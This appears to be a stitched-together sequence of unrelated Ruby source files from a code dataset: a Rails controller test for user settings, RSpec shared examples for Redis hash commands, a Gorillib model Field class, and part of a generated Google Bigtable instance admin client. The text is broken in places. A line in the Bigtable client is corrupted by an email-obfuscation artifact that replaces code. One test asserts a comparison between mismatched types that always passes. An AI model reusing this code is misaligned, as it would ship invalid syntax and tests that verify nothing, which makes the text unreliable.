  test "should change theme" do
    login_as @user
    ["day", "night", "sunset"].each do |theme|
      post :theme, params: {theme: theme}
      assert_equal(theme, @user.reload.theme)
    end
  end

  test "should change entry width" do
    login_as @user
    # The endpoint toggles the stored width, so before/after must differ.
    post :entry_width
    assert_not_equal @user.entry_width, @user.reload.entry_width
  end

  test "should update now playing" do
    @feeds = create_feeds(@user)
    @entries = @user.entries
    login_as @user
    post :now_playing, params: {now_playing_entry: @entries.first.id}
    # NOTE(review): this compares an Integer id to a String, which is always
    # unequal regardless of controller behavior -- verify the intended
    # assertion (probably assert_equal with matching types).
    assert_not_equal @entries.first.id, @user.reload.now_playing_entry.to_s
  end

  test "should remove now playing" do
    login_as @user
    now_playing_entry = "1"
    @user.update(now_playing_entry: now_playing_entry)
    assert_equal @user.reload.now_playing_entry, now_playing_entry
    post :now_playing, params: {remove_now_playing_entry: 1}
    assert_nil @user.reload.now_playing_entry
  end

  test "should change audio panel size" do
    login_as @user
    %w[minimized maximized].each do |audio_panel_size|
      post :audio_panel_size, params: {audio_panel_size: audio_panel_size}
      assert_equal(audio_panel_size, @user.reload.audio_panel_size)
    end
  end
end
| 28.633188 | 137 | 0.706573 |
08247c716d6a6cd60568174b9258aa8fd77f92d0 | 5,713 | # coding: utf-8
# Shared examples covering the Redis hash commands (HGET, HGETALL, HMGET,
# HSET, HMSET) against whatever `redis` object the host group provides.
#
# STRUCTURAL FIX: the "hmset" context was accidentally nested inside the
# "hset" context (a misplaced `end`); it is now a sibling top-level context.
# Example descriptions that contradicted their assertions ("returns 0" for
# an expected `true`, etc.) have been corrected to match the asserted
# values.
RSpec.shared_examples "hashes" do
  context "hget" do
    context "when the hash doesn't exist" do
      it "returns nil" do
        expect(
          redis.hget("foo","bar")
        ).to eql(nil)
      end
    end

    context "when the hash exists with a single field" do
      before do
        redis.hset("foo", "bar","1")
      end

      context "requesting that field" do
        it "returns the value" do
          expect(
            redis.hget("foo", "bar")
          ).to eql("1")
        end
      end

      context "requesting a field that doesn't exist" do
        it "returns nil" do
          expect(
            redis.hget("foo", "aaa")
          ).to eql(nil)
        end
      end
    end

    context "when the hash exists with a single field but it's expired" do
      before do
        redis.hset("foo", "bar", "10")
        redis.expire("foo", 1) # TODO change this to pexpire
        sleep(1.1)
      end

      it "returns nil" do
        expect(
          redis.hget("foo", "bar")
        ).to eql(nil)
      end
    end
  end

  context "hgetall" do
    context "when the hash doesn't exist" do
      it "returns an empty array" do
        expect(
          redis.hgetall("foo")
        ).to eql({})
      end
    end

    context "when the hash exists with two fields" do
      before do
        redis.hset("foo", "bar","1")
        redis.hset("foo", "baz","2")
      end

      context "requesting all values" do
        it "returns the fields and values in an array" do
          expect(
            redis.hgetall("foo")
          ).to eql({"bar" => "1", "baz" => "2"})
        end
      end
    end

    context "when the hash exists with a single field but it's expired" do
      before do
        redis.hset("foo", "bar", "1")
        redis.expire("foo", 1) # TODO change this to pexpire
        sleep(1.1)
      end

      it "returns an empty array" do
        expect(
          redis.hgetall("foo")
        ).to eql({})
      end
    end
  end

  context "hmget" do
    context "when the hash doesn't exist" do
      it "returns an array with nil" do
        expect(
          redis.hmget("foo","bar")
        ).to eql([nil])
      end
    end

    context "when the hash exists with two fields field" do
      before do
        redis.hset("foo", "bar","1")
        redis.hset("foo", "baz","2")
      end

      context "requesting both fields" do
        it "returns an array with the values" do
          expect(
            redis.hmget("foo", "bar", "baz")
          ).to eql(["1","2"])
        end
      end

      context "requesting a field that doesn't exist" do
        it "returns an array with the values or nil" do
          expect(
            redis.hmget("foo", "aaa", "bar")
          ).to eql([nil,"1"])
        end
      end
    end

    context "when the hash exists with a single field but it's expired" do
      before do
        redis.hset("foo", "bar", "10")
        redis.expire("foo", 1) # TODO change this to pexpire
        sleep(1.1)
      end

      it "returns an array with nil" do
        expect(
          redis.hmget("foo", "bar")
        ).to eql([nil])
      end
    end
  end

  context "hset" do
    context "when the hash doesn't exist" do
      it "returns true" do
        expect(
          redis.hset("foo","bar","1")
        ).to eql(true)
      end

      it "creates the hash on demand" do
        redis.hset("foo","bar","1")
        expect(
          redis.hgetall("foo")
        ).to eql({"bar" => "1"})
      end
    end

    context "when the hash exists with a single field" do
      before do
        redis.hset("foo", "bar","1")
      end

      context "adding a new field" do
        it "returns true" do
          expect(
            redis.hset("foo", "baz", "2")
          ).to eql(true)
        end

        it "adds the field to the hash" do
          redis.hset("foo", "baz", "2")
          expect(
            redis.hgetall("foo")
          ).to eql({"bar" => "1", "baz" => "2"})
        end
      end

      context "updating an existing field" do
        it "returns false" do
          expect(
            redis.hset("foo", "bar", "2")
          ).to eql(false)
        end

        it "updates the field" do
          redis.hset("foo", "bar", "2")
          expect(
            redis.hgetall("foo")
          ).to eql({"bar" => "2"})
        end
      end
    end
  end

  context "hmset" do
    context "when the hash doesn't exist" do
      it "returns 'OK'" do
        expect(
          redis.hmset("foo","bar","1")
        ).to eql("OK")
      end

      it "creates the hash on demand" do
        redis.hmset("foo","bar","1")
        expect(
          redis.hgetall("foo")
        ).to eql({"bar" => "1"})
      end
    end

    context "when the hash exists with a single field" do
      before do
        redis.hset("foo", "bar","1")
      end

      context "adding two new fields" do
        it "returns OK" do
          expect(
            redis.hmset("foo", "aaa", "2", "bbb", "3")
          ).to eql("OK")
        end

        it "adds the field to the hash" do
          redis.hmset("foo", "aaa", "2", "bbb", "3")
          expect(
            redis.hgetall("foo")
          ).to eql({"bar" => "1", "aaa" => "2", "bbb" => "3"})
        end
      end

      context "updating an existing field" do
        it "returns OK" do
          expect(
            redis.hmset("foo", "bar", "2")
          ).to eql("OK")
        end

        it "updates the field" do
          redis.hmset("foo", "bar", "2")
          expect(
            redis.hgetall("foo")
          ).to eql({"bar" => "2"})
        end
      end
    end
  end
end
| 25.968182 | 74 | 0.479783 |
ac36462c53082a9afab9e64567c370b68b29970c | 6,576 | module Gorillib
module Model
# Represents a field for reflection
#
# @example Usage
# Gorillib::Model::Field.new(:name => 'problems', type => Integer, :doc => 'Count of problems')
#
#
# Represents a field for reflection
#
# @example Usage
#   Gorillib::Model::Field.new(:name => 'problems', type => Integer, :doc => 'Count of problems')
#
class Field
  include Gorillib::Model
  remove_possible_method(:type)

  # [Gorillib::Model] Model owning this field
  attr_reader :model

  # [Hash] all options passed to the field not recognized by one of its own current fields
  attr_reader :_extra_attributes

  # Note: `Gorillib::Model::Field` is assembled in two pieces, so that it
  # can behave as a model itself. Defining `name` here, along with some
  # fudge in #initialize, provides enough functionality to bootstrap.
  # The fields are then defined properly at the end of the file.
  attr_reader :name
  attr_reader :type

  class_attribute :visibilities, :instance_writer => false
  self.visibilities = { :reader => :public, :writer => :public, :receiver => :public, :tester => false }

  # @param [#to_sym]                name    Field name
  # @param [#receive]               type    Factory for field values. To accept any object as-is, specify `Object` as the type.
  # @param [Gorillib::Model]        model   Field's owner
  # @param [Hash{Symbol => Object}] options Extended attributes
  # @option options [String] doc Description of the field's purpose
  # @option options [true, false, :public, :protected, :private] :reader   Visibility for the reader (`#foo`) method; `false` means don't create one.
  # @option options [true, false, :public, :protected, :private] :writer   Visibility for the writer (`#foo=`) method; `false` means don't create one.
  # @option options [true, false, :public, :protected, :private] :receiver Visibility for the receiver (`#receive_foo`) method; `false` means don't create one.
  #
  def initialize(model, name, type, options={})
    Validate.identifier!(name)
    type_opts = options.extract!(:blankish, :empty_product, :items, :keys, :of)
    type_opts[:items] = type_opts.delete(:of) if type_opts.has_key?(:of)
    @model = model
    @name  = name.to_sym
    @type  = Gorillib::Factory.factory_for(type, type_opts)
    default_visibilities = visibilities
    @visibilities = default_visibilities.merge( options.extract!(*default_visibilities.keys) )
    # BUGFIX: was `options.delete(:name)`; :doc is the documented option key
    # (see @option above), defaulting to "<name> field" when absent.
    @doc = options.delete(:doc){ "#{name} field" }
    receive!(options)
  end

  # __________________________________________________________________________

  # @return [String] the field name
  def to_s
    name.to_s
  end

  # @return [String] Human-readable presentation of the field definition
  def inspect
    args = [name.inspect, type.to_s, attributes.reject{|k,v| k =~ /^(name|type)$/}.inspect[1..-2] ]
    "field(#{args.join(", ")})"
  end

  # Abbreviated human-readable presentation: just the field name.
  def inspect_compact
    "field(#{name})"
  end

  # @return [Hash] all attributes plus visibility settings and any
  #   unrecognized extra options.
  def to_hash
    # BUGFIX: was `attributes.merge!(@visibility)` -- that ivar is never
    # assigned (the real one is @visibilities), so Hash#merge! raised a
    # TypeError on nil. Non-destructive merge also avoids mutating the
    # hash returned by #attributes.
    attributes.merge(@visibilities).merge(@_extra_attributes)
  end

  # Fields are equal when their attributes, extra options, and owning model
  # all match.
  def ==(val)
    super && (val._extra_attributes == self._extra_attributes) && (val.model == self.model)
  end

  # Factory-style constructor from an attribute hash holding :model, :name
  # and :type plus any field options.
  def self.receive(hsh)
    name  = hsh.fetch(:name)
    type  = hsh.fetch(:type)
    model = hsh.fetch(:model)
    new(model, name, type, hsh)
  end

  #
  # returns the visibility
  #
  # @example reader is protected, no writer:
  #   Foo.field :granuloxity, :reader => :protected, :writer => false
  #
  def visibility(meth_type)
    Validate.included_in!("method type", meth_type, @visibilities.keys)
    @visibilities[meth_type]
  end

protected

  # Defines this field's reader/writer/tester/receiver methods on the given
  # model, honoring each method's configured visibility.
  def inscribe_methods(model)
    model.__send__(:define_attribute_reader,   self.name, self.type, visibility(:reader))
    model.__send__(:define_attribute_writer,   self.name, self.type, visibility(:writer))
    model.__send__(:define_attribute_tester,   self.name, self.type, visibility(:tester))
    model.__send__(:define_attribute_receiver, self.name, self.type, visibility(:receiver))
  end

public

  #
  # Now we can construct the actual fields.
  #

  field :position, Integer, :tester => true, :doc => "Indicates this is a positional initialization arg -- you can pass it as a plain value in the given slot to #initialize"

  # Name of this field. Must start with `[A-Za-z_]` and subsequently contain only `[A-Za-z0-9_]` (required)
  # @macro [attach] field
  #   @attribute $1
  #   @return [$2] the $1 field $*
  field :name, String, position: 0, writer: false, doc: "The field name. Must start with `[A-Za-z_]` and subsequently contain only `[A-Za-z0-9_]` (required)"

  field :type, Class, position: 1, doc: "Factory to generate field's values"

  field :doc, String, doc: "Field's description"

  # remove the attr_reader method (needed for scaffolding), leaving the meta_module method to remain
  remove_possible_method(:name)
end
# Field subclass for collection-valued attributes: the field's type is the
# collection class, and :item_type (or the `of:` shorthand) supplies the
# factory for individual members.
class SimpleCollectionField < Gorillib::Model::Field
  field :item_type, Class, default: Whatever, doc: "Factory for collection items"

  def initialize(model, name, type, options={})
    super
    coll_factory   = self.type
    member_factory = self.item_type
    key_method = options[:key_method] if options[:key_method]
    unless member_factory
      raise "Please supply an item type for #{self.inspect} -- eg 'collection #{name.inspect}, of: FooClass'"
    end
    # Default builds an empty collection bound to this field; the lambda
    # captures the factories resolved above.
    self.default ||= ->{ coll_factory.new(item_type: member_factory, belongs_to: self, key_method: key_method) }
  end

  # In addition to the standard accessors, collections get a dedicated
  # collection receiver on the model.
  def inscribe_methods(model)
    super
    model.__send__(:define_collection_receiver, self)
  end
end
end
end
# * aliases
# * order
# * dirty
# * lazy
# * mass assignable
# * identifier / index
# * hook
# * validates / required
# - presence => true
# - uniqueness => true
# - numericality => true # also :==, :>, :>=, :<, :<=, :odd?, :even?, :equal_to, :less_than, etc
# - length => { :< => 7 } # also :==, :>=, :<=, :is, :minimum, :maximum
# - format => { :with => /.*/ }
# - inclusion => { :in => [1,2,3] }
# - exclusion => { :in => [1,2,3] }
| 38.911243 | 183 | 0.612378 |
ab07461dfbcff032d880a4f33b793f014ed4f351 | 143,308 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/bigtable/admin/v2/bigtable_instance_admin_pb"
module Google
module Cloud
module Bigtable
module Admin
module V2
module BigtableInstanceAdmin
##
# Client for the BigtableInstanceAdmin service.
#
# Service for creating, configuring, and deleting Cloud Bigtable Instances and
# Clusters. Provides access to the Instance and Cluster schemas only, not the
# tables' metadata or data stored in those tables.
#
class Client
include Paths
# @private
attr_reader :bigtable_instance_admin_stub
##
# Configure the BigtableInstanceAdmin Client class.
#
# See {::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client::Configuration}
# for a description of the configuration fields.
#
# @example
#
# # Modify the configuration for all BigtableInstanceAdmin clients
# ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
  # Memoized: the class-level configuration is built once and shared.
  @configure ||= begin
    namespace = ["Google", "Cloud", "Bigtable", "Admin", "V2"]
    # Walk outward through the namespace to find the nearest enclosing
    # module that responds to .configure, so settings inherit hierarchically
    # (the `while` expression yields the `break` value, or nil).
    parent_config = while namespace.any?
                      parent_name = namespace.join "::"
                      parent_const = const_get parent_name
                      break parent_const.configure if parent_const.respond_to? :configure
                      namespace.pop
                    end
    default_config = Client::Configuration.new parent_config

    # Per-RPC defaults below. retry_codes [14, 4] are the gRPC status codes
    # UNAVAILABLE and DEADLINE_EXCEEDED; only idempotent reads/updates get a
    # retry policy, while create/delete RPCs are timeout-only.
    default_config.rpcs.create_instance.timeout = 300.0

    default_config.rpcs.get_instance.timeout = 60.0
    default_config.rpcs.get_instance.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.list_instances.timeout = 60.0
    default_config.rpcs.list_instances.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.update_instance.timeout = 60.0
    default_config.rpcs.update_instance.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.partial_update_instance.timeout = 60.0
    default_config.rpcs.partial_update_instance.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.delete_instance.timeout = 60.0

    default_config.rpcs.create_cluster.timeout = 60.0

    default_config.rpcs.get_cluster.timeout = 60.0
    default_config.rpcs.get_cluster.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.list_clusters.timeout = 60.0
    default_config.rpcs.list_clusters.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.update_cluster.timeout = 60.0
    default_config.rpcs.update_cluster.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.delete_cluster.timeout = 60.0

    default_config.rpcs.create_app_profile.timeout = 60.0

    default_config.rpcs.get_app_profile.timeout = 60.0
    default_config.rpcs.get_app_profile.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.list_app_profiles.timeout = 60.0
    default_config.rpcs.list_app_profiles.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.update_app_profile.timeout = 60.0
    default_config.rpcs.update_app_profile.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.delete_app_profile.timeout = 60.0

    default_config.rpcs.get_iam_policy.timeout = 60.0
    default_config.rpcs.get_iam_policy.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.set_iam_policy.timeout = 60.0

    default_config.rpcs.test_iam_permissions.timeout = 60.0
    default_config.rpcs.test_iam_permissions.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config.rpcs.list_hot_tablets.timeout = 60.0
    default_config.rpcs.list_hot_tablets.retry_policy = {
      initial_delay: 1.0, max_delay: 60.0, multiplier: 2, retry_codes: [14, 4]
    }

    default_config
  end
  yield @configure if block_given?
  @configure
end
##
# Configure the BigtableInstanceAdmin Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
# Yields this client's derived configuration (when a block is given),
# then returns it.
def configure
  @config.tap { |c| yield c if block_given? }
end
##
# Create a new BigtableInstanceAdmin client object.
#
# @example
#
# # Create a client using the default configuration
# client = ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a client using a custom configuration
# client = ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the BigtableInstanceAdmin client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/bigtable/admin/v2/bigtable_instance_admin_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the endpoint is unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint &&
[email protected](".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@operations_client = Operations.new do |config|
config.credentials = credentials
config.quota_project = @quota_project_id
config.endpoint = @config.endpoint
end
@bigtable_instance_admin_stub = ::Gapic::ServiceStub.new(
::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
##
# Get the associated client for long-running operations.
#
# This is the same operations client that the long-running RPCs on this
# class (e.g. create_instance, partial_update_instance, create_cluster)
# use to wrap their responses in a ::Gapic::Operation.
#
# @return [::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Operations]
#
attr_reader :operations_client
# Service calls
##
# Create an instance within a project.
#
# Note that exactly one of Cluster.serve_nodes and
# Cluster.cluster_config.cluster_autoscaling_config can be set. If
# serve_nodes is set to non-zero, then the cluster is manually scaled. If
# cluster_config.cluster_autoscaling_config is non-empty, then autoscaling is
# enabled.
#
# @overload create_instance(request, options = nil)
# Pass arguments to `create_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_instance(parent: nil, instance_id: nil, instance: nil, clusters: nil)
# Pass arguments to `create_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the project in which to create the new instance.
# Values are of the form `projects/{project}`.
# @param instance_id [::String]
# Required. The ID to be used when referring to the new instance within its project,
# e.g., just `myinstance` rather than
# `projects/myproject/instances/myinstance`.
# @param instance [::Google::Cloud::Bigtable::Admin::V2::Instance, ::Hash]
# Required. The instance to create.
# Fields marked `OutputOnly` must be left blank.
# @param clusters [::Hash{::String => ::Google::Cloud::Bigtable::Admin::V2::Cluster, ::Hash}]
# Required. The clusters to be created within the instance, mapped by desired
# cluster ID, e.g., just `mycluster` rather than
# `projects/myproject/instances/myinstance/clusters/mycluster`.
# Fields marked `OutputOnly` must be left blank.
# Currently, at most four clusters can be specified.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest.new
#
# # Call the create_instance method.
# result = client.create_instance request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
# Starts creation of an instance. Returns a ::Gapic::Operation wrapping
# the server-side long-running operation; see the YARD docs above for
# argument details.
def create_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::CreateInstanceRequest

  # Normalize a Hash (or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Start from the per-RPC metadata, then layer on the standard headers.
  call_metadata = @config.rpcs.create_instance.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's resource name.
  routing_params = {}
  routing_params["parent"] = request.parent if request.parent
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |k, v| "#{k}=#{v}" }.join("&")

  # RPC-specific defaults take precedence over client-wide defaults.
  options.apply_defaults timeout: @config.rpcs.create_instance.timeout,
                         metadata: call_metadata,
                         retry_policy: @config.rpcs.create_instance.retry_policy
  options.apply_defaults timeout: @config.timeout,
                         metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :create_instance, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/cancel it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets information about an instance.
#
# @overload get_instance(request, options = nil)
# Pass arguments to `get_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_instance(name: nil)
# Pass arguments to `get_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the requested instance. Values are of the form
# `projects/{project}/instances/{instance}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::Instance]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::Instance]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest.new
#
# # Call the get_instance method.
# result = client.get_instance request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::Instance.
# p result
#
# Gets information about a single instance. See the YARD docs above for
# argument details.
def get_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::GetInstanceRequest

  # Normalize a Hash (or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Start from the per-RPC metadata, then layer on the standard headers.
  call_metadata = @config.rpcs.get_instance.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's resource name.
  routing_params = {}
  routing_params["name"] = request.name if request.name
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |k, v| "#{k}=#{v}" }.join("&")

  # RPC-specific defaults take precedence over client-wide defaults.
  options.apply_defaults timeout: @config.rpcs.get_instance.timeout,
                         metadata: call_metadata,
                         retry_policy: @config.rpcs.get_instance.retry_policy
  options.apply_defaults timeout: @config.timeout,
                         metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :get_instance, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Lists information about instances in a project.
#
# @overload list_instances(request, options = nil)
# Pass arguments to `list_instances` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_instances(parent: nil, page_token: nil)
# Pass arguments to `list_instances` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the project for which a list of instances is requested.
# Values are of the form `projects/{project}`.
# @param page_token [::String]
# DEPRECATED: This field is unused and ignored.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::ListInstancesResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::ListInstancesResponse]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest.new
#
# # Call the list_instances method.
# result = client.list_instances request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::ListInstancesResponse.
# p result
#
# Lists information about instances in a project. See the YARD docs above
# for argument details.
def list_instances request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::ListInstancesRequest

  # Normalize a Hash (or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Start from the per-RPC metadata, then layer on the standard headers.
  call_metadata = @config.rpcs.list_instances.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's resource name.
  routing_params = {}
  routing_params["parent"] = request.parent if request.parent
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |k, v| "#{k}=#{v}" }.join("&")

  # RPC-specific defaults take precedence over client-wide defaults.
  options.apply_defaults timeout: @config.rpcs.list_instances.timeout,
                         metadata: call_metadata,
                         retry_policy: @config.rpcs.list_instances.retry_policy
  options.apply_defaults timeout: @config.timeout,
                         metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :list_instances, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates an instance within a project. This method updates only the display
# name and type for an Instance. To update other Instance properties, such as
# labels, use PartialUpdateInstance.
#
# @overload update_instance(request, options = nil)
# Pass arguments to `update_instance` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::Instance} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::Instance, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_instance(name: nil, display_name: nil, state: nil, type: nil, labels: nil)
